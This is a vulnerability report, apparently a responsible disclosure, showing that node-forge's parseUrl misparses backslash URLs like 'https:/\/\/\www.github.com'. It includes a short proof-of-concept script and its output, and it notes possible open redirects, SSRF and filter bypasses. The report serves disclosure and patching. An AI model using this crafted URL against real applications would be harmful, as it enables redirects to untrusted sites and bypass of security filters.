✍️ Description

parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path. Browsers accept backslashes after the protocol, and treat it as a normal slash, while node-forge sees it as a relative path and leads to URL Redirection to Untrusted Site.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var forge = require("node-forge");
var url = forge.util.parseUrl("https:/\/\/\www.github.com/foo/bar");
console.log(url);

Execute the following commands in another terminal:

npm i node-forge # Install affected module
node poc.js #  Run the PoC

Check the Output:

{
  full: 'https://',
  scheme: 'https',
  host: '',
  port: 443,
  path: '/www.github.com/foo/bar',                        <<<---- path  should be "/foo/bar"
  fullHost: ''
}

In the above example path should be "/foo/bar" or it should return it as null as per https://github.com/digitalbazaar/forge/blob/c666282c812d6dc18e97b419b152dd6ad98c802c/lib/util.js#L2266

💥 Impact

Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.